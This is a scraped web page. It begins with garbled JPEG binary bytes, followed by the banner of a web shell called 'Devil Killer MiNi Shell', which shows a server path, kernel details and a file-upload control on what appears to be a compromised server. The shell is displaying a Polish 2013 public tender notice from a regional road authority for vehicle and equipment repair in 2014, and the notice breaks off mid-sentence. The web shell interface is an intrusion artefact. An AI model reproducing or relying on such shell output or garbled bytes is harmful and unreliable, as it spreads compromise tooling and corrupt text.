JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131217/523228-N-2013.html

<p class="kh_header"><b>Bydgoszcz: Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu  oraz dostawa części zamiennych w 2014r. z podziałem na 6 części</b><br>
<b>Numer ogłoszenia: 523228 - 2013; data zamieszczenia: 17.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu  oraz dostawa części zamiennych w 2014r. z podziałem na 6 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia są: Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu  oraz dostawa części zamiennych w 2014r. z podziałem na 6 części
2.  Zamówienie obejmuje następujące usługi:
Część zamówienia nr 1 - dotyczy  naprawy środków transportowych garażujących w siedzibie RDW w Tucholi  
 Zakres usługi:                       (szacunkowa ilość r-godz. 550) 
-	naprawy samochodu osobowego marki DACIA LOGAN;
-	naprawy samochodu osobowego marki Polonez nr 1;
-	naprawy samochodu marki Lublin nr 1;
-	przyczepka VIOLA o masie całkowitej do 750 kg nr 1;

Część zamówienia nr 2 - dotyczy  naprawy środków transportowych garażujących w Szubinie
Zakres usługi:                       (szacunkowa ilość r-godz. 190) 
-	naprawy samochodu osobowego marki SKODA FABIA;
-	naprawy samochodu marki Lublin nr 2.
-	przyczepka VIOLA o masie całkowitej do 750 kg nr 2;
-	naprawa rębaka nr 2

 Część zamówienia nr 3 -  dotyczy  naprawy środków transportowych garażujących w siedzibie RDW w Tucholi  
Zakres usługi:                      (szacunkowa ilość r-godz. 300)
-	naprawa ciągnika rolniczego FARMTRAC
-	naprawa przyczepy ciągnikowej;
-	naprawy kosiarki, agregatu, rębaka nr 1;
-	podnośnik TUR-2;

 Część zamówienia nr 4 - dotyczy  naprawy i konserwacji sprzętu STIHL i HUSQVARNA  garażujących w siedzibie RDW w Tucholi  
Zakres usługi:                      (szacunkowa ilość r-godz. 150)
-	naprawa wykaszarki STIHL nr1 i wykaszarki STIHL nr2;
-	naprawa wykaszarki STIHL  FS450 nr 1 i wykaszarki STIHL  FS450 nr 2;
-	naprawa podkrzesywarki STIHL131 nr1 i podkrzesywarki STIHL131 nr 2;
-	naprawa pilarki  STIHL nr1 i pilarki  STIHL nr 2;
-	naprawa przecinarki do betonu STIHL
-	naprawa wiertnicy glebowej STIHL
-	naprawa kosiarki spalinowej HUSQVARNA
-	naprawa pilarki spalinowej HUSQVARNA 345
-	naprawa pilarki spalinowej HUSQVARNA 365 nr 1 i pilarki spalinowej HUSQVARNA 365 nr2;
-	naprawa zagęszczarki HUSQVARNA nr1 i zagęszczarki HUSQVARNA nr 2;
-	naprawa zamiatarki STIHL nr 1;
-	naprawa pługa wirnikowego STIHL nr 2;

Część zamówienia nr 5 - dotyczy naprawy i konserwacji osprzętu specjalistycznego do 
UNIMOGA garażujących w siedzibie RDW w Tucholi  
Zakres usługi:                      (szacunkowa ilość r-godz. 100)
      -  naprawa głowicy do koszenia trawy 
      -  naprawa głowicy do cięcia krzewów
      -  naprawa wiertnicy glebowej 
      -  naprawa myjki do znaków
      -  naprawa wysięgnika (ramie robocze)
      -  naprawa odmularki
      -  naprawa pługa wirnikowego
      -  naprawa pługa lekkiego
      -  naprawa solarki 

Część zamówienia nr 6 - dotyczy naprawy i konserwacji pojazdu specjalistycznego typu Mercedes - Benz UNIMOG garażujący w siedzibie RDW w Tucholi  
Zakres usługi:                      (szacunkowa ilość r-godz. 300)

3.	Usługa obejmuje wykonanie prac (robociznę) oraz dostawę  i montaż nowych 
            potrzebnych materiałów eksploatacyjnych, akcesoriów gumowych oraz części 
            zamiennych pojazdów lub sprzętu. 

4.	Wykonawca winien mieć możliwość samodzielnego wykonania kompleksowej obsługi pojazdów i sprzętu z zakresu:
-	   napraw mechaniki, elektromechaniki, takich jak: naprawa zawieszenia, naprawa układu kierowniczego, naprawa układu napędowego, itp.
-	   konserwacji pojazdów i sprzętu,
-	   przeglądów technicznych OT-2,
-	posiadać zaplecze techniczne, kadrę pracowniczą  i praktykę do przeprowadzenia wymienionego zakresu napraw pojazdów i podzespołów,
5.    Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego polecenia wykonania naprawy do: 
odebrania pojazdu lub sprzętu z miejsca wskazanego przez Zamawiającego                       i przetransportowania go do miejsca wykonania naprawy na własny koszt i ryzyko, a po naprawie do odstawienia pojazdu lub sprzętu do wskazanego w pkt. 2 miejsca garażowania. Cena ewentualnego transportu pojazdu winna być wkalkulowana w cenę jednostkową roboczogodziny.

6.     Wykonawca wykona bieżące naprawy w terminie nie dłuższym niż do 3 dni 
        roboczych, a termin usunięcia awarii zostanie każdorazowo uzgodniony między 
        stronami.

7.  	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.

8.      Wykonawca udzieli na wykonane usługi naprawcze 6 miesięcznej gwarancji    
          liczonej od dnia wystawienia faktury oraz na użyte części do  napraw wykonanych  
         w ramach gwarancji - gwarancji na okres zgodny z  udzieloną gwarancją   
         producenta.

9. 	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowioną osobą odpowiedzialną za realizację umowy ze strony wykonawcy.

10.    W przypadkach, gdy podczas wykonywania przeglądu lub naprawy, wystąpi oprócz             
          przewidzianych operacji konieczność dodatkowych wymian lub naprawy, mogą 
         one być wykonane tylko za zgodą Zamawiającego.

11.      Zamawiający dopuszcza możliwość zwiększenia ilości obsługiwanych pojazdów               
          i sprzętu w trakcie trwania umowy.

12.	Na zastosowane części i materiały Wykonawca udzieli Zamawiającemu stałego rabatu obowiązującego w niezmienionej wysokości przez cały okres realizacji zamówienia. 
 
13.   Wykonawca zobowiązany będzie do utylizacji zużytych części zamiennych, akcesoriów i materiałów eksploatacyjnych wymienionych podczas napraw..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie  z art. 67 ust. 1 pkt 6 ustawy Pzp Zamawiający przewiduje udzielanie zamówienia uzupełniającego, jednakże w wysokości nie większej niż 30% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia. Zamawiający udzieli zamówień uzupełniających tylko wtedy, gdy będzie posiadał środki finansowe na ich wykonanie. Na okoliczność wystąpienia zamówień uzupełniających, zostanie zawarta umowa w trybie zamówienia z wolnej ręki.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy posiadający wiedzę i doświadczenie z zakresu objętego zamówieniem. Wykonawca w celu zweryfikowania przez Zamawiającego jego zdolności do należytego wykonania udzielanego zamówienia oraz oceny spełnienia  warunku musi wykazać, że wykonał, a przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej 1 zamówienie na usługi w zakresie naprawy i konserwacji pojazdów silnikowych i podobnego sprzętu w ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy dysponującym odpowiednim potencjałem technicznym. Wykonawca w celu zweryfikowania przez Zamawiającego jego zdolności do należytego wykonania udzielanego zamówienia oraz oceny spełnienia  warunku musi wykazać, iż dysponuje lub będzie dysponował w czasie wykonania umowy (wraz z informacją o podstawie dysponowania):
		   - warsztatem co najmniej 1 stanowiskowym - szt. 1, 
	
Wykonawca, który złoży ofertę na więcej niż jedną część, musi w każdej ofercie wykazać potencjał zgodnie z wymaganiami podanymi powyżej, przy czym dopuszcza się łączenie potencjału dla więcej niż jednej części</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy dysponujący odpowiednim potencjałem kadrowym. Wykonawca w celu zweryfikowania przez Zamawiającego jego zdolności do należytego wykonania udzielanego zamówienia oraz oceny spełnienia  warunku musi wykazać, iż dysponuje lub będzie dysponował czasie wykonania umowy (wraz z informacją o podstawie dysponowania): 
            - mechanik - 1 osoba
Wykonawca, który złoży ofertę na więcej niż jedną część, musi w każdej ofercie wykazać  potencjał zgodnie z wymaganiami podanymi powyżej, przy czym dopuszcza się łączenie potencjału dla więcej niż jednej części</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. VI.C.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.  Odnośnie terminów wystawienia niniejszego dokumentu stosuje się odpowiednio wymagania określone w pkt. VI.C.1.
2.	Wypełniony i podpisany FORMULARZ OFERTY (Załącznik nr 1 do SIWZ).
3.	Wypełnione i podpisane KOSZTORYSY OFERTOWE (Załącznik nr 2a, nr 2b, nr 2c, nr 2d, nr 2e lub 2f do SIWZ).
4.	W przypadku ustanowienia pełnomocnika do podpisywania oferty winno być dołączone pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) o ile nie wynika ono z innych dokumentów dołączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego na                warunkach określonych we wzorze Istotnych Postanowień Umowy będącej                       załącznikiem nr 9 do niniejszej SIWZ, co Wykonawca potwierdza w formularzu              oferty.
2.	Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej                         z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
2.1. Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę pod wykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji usług. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. Zmiany podwykonawcy można dokonać jedynie, jeżeli wykonywanie części robót przez podwykonawcę zostało wskazane przez Wykonawcę w ofercie. W wypadku gdy Wykonawca nie wskaże w ofercie iż zamierza powierzyć część robót podwykonawcom, ich wprowadzenie na etapie wykonywania umowy jest niedopuszczalne.

2.2.  	Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy;
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy, a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.

2.3. 	Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych             w treści umowy.

2.4.	Zmiany wynagrodzenia w przypadku:

       	a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);

3.	Zmiany uzasadnione okolicznościami, o których mowa w art. 357 1 Ustawy z dnia 23 kwietnia 1964r. - Kodeks cywilny (Dz. U. z 1064r., Nr 16, poz. 93 z późn. zm.) - Jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy

4. 	Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdw-bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Tucholi, 
	ul. Przemysłowa 4, 89-500 Tuchola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2013 godzina 08:45, miejsce: Rejon Dróg Wojewódzkich w Tucholi, 
	ul. Przemysłowa 4, 89-500 Tuchola, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu  oraz dostawa części zamiennych w 2014r. z podziałem na 6 części.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje następujące usługi:
Część zamówienia nr 1 - dotyczy  naprawy środków transportowych garażujących w siedzibie RDW w Tucholi  
 Zakres usługi:                       (szacunkowa ilość r-godz. 550) 
-	naprawy samochodu osobowego marki DACIA LOGAN;
-	naprawy samochodu osobowego marki Polonez nr 1;
-	naprawy samochodu marki Lublin nr 1;
-	przyczepka VIOLA o masie całkowitej do 750 kg nr 1;
2.	Usługa obejmuje wykonanie prac (robociznę) oraz dostawę  i montaż nowych 
            potrzebnych materiałów eksploatacyjnych, akcesoriów gumowych oraz części 
            zamiennych pojazdów lub sprzętu. 

3.	Wykonawca winien mieć możliwość samodzielnego wykonania kompleksowej obsługi pojazdów i sprzętu z zakresu:
-	   napraw mechaniki, elektromechaniki, takich jak: naprawa zawieszenia, naprawa układu kierowniczego, naprawa układu napędowego, itp.
-	   konserwacji pojazdów i sprzętu,
-	   przeglądów technicznych OT-2,
-	posiadać zaplecze techniczne, kadrę pracowniczą  i praktykę do przeprowadzenia wymienionego zakresu napraw pojazdów i podzespołów,
4.    Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego polecenia wykonania naprawy do: 
odebrania pojazdu lub sprzętu z miejsca wskazanego przez Zamawiającego                       i przetransportowania go do miejsca wykonania naprawy na własny koszt i ryzyko, a po naprawie do odstawienia pojazdu lub sprzętu do wskazanego w pkt. 2 miejsca garażowania. Cena ewentualnego transportu pojazdu winna być wkalkulowana w cenę jednostkową roboczogodziny.

5.     Wykonawca wykona bieżące naprawy w terminie nie dłuższym niż do 3 dni 
        roboczych, a termin usunięcia awarii zostanie każdorazowo uzgodniony między 
        stronami.

6.  	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.

7.      Wykonawca udzieli na wykonane usługi naprawcze 6 miesięcznej gwarancji    
          liczonej od dnia wystawienia faktury oraz na użyte części do  napraw wykonanych  
         w ramach gwarancji - gwarancji na okres zgodny z  udzieloną gwarancją   
         producenta.

8. 	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowioną osobą odpowiedzialną za realizację umowy ze strony wykonawcy.

9.    W przypadkach, gdy podczas wykonywania przeglądu lub naprawy, wystąpi oprócz             
